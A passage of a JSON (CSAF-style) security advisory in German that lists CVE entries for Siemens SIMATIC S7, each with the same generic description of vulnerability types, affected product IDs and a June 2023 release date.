"CVE-2022-3524" }, { "cve": "CVE-2022-3521", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-3521" }, { "cve": "CVE-2022-34918", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-34918" }, { "cve": "CVE-2022-3435", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-3435" }, { "cve": "CVE-2022-3303", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-3303" }, { "cve": "CVE-2022-32296", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-32296" }, { "cve": "CVE-2022-32250", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-32250" }, { "cve": "CVE-2022-3169", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-3169" }, { "cve": "CVE-2022-3115", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-3115" }, { "cve": "CVE-2022-3104", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-3104" }, { "cve": "CVE-2022-3028", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-3028" }, { "cve": "CVE-2022-30065", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-30065" }, { "cve": "CVE-2022-2978", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-2978" }, { "cve": "CVE-2022-2959", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-2959" }, { "cve": "CVE-2022-2905", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-2905" }, { "cve": "CVE-2022-28391", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-28391" }, { "cve": "CVE-2022-2663", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-2663" }, { "cve": "CVE-2022-26373", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-26373" }, { "cve": "CVE-2022-2602", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-2602" }, { "cve": "CVE-2022-2588", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-2588" }, { "cve": "CVE-2022-2586", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-2586" }, { "cve": "CVE-2022-2585", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-2585" }, { "cve": "CVE-2022-2503", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-2503" }, { "cve": "CVE-2022-2327", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-2327" }, { "cve": "CVE-2022-23219", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-23219" }, { "cve": "CVE-2022-23218", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-23218" }, { "cve": "CVE-2022-2274", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-2274" }, { "cve": "CVE-2022-2153", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-2153" }, { "cve": "CVE-2022-21505", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-21505" }, { "cve": "CVE-2022-21233", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-21233" }, { "cve": "CVE-2022-21166", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-21166" }, { "cve": "CVE-2022-21125", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-21125" }, { "cve": "CVE-2022-21123", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-21123" }, { "cve": "CVE-2022-2097", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-2097" }, { "cve": "CVE-2022-2078", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-2078" }, { "cve": "CVE-2022-2068", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2022-2068" }, { "cve": "CVE-2022-20572", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu 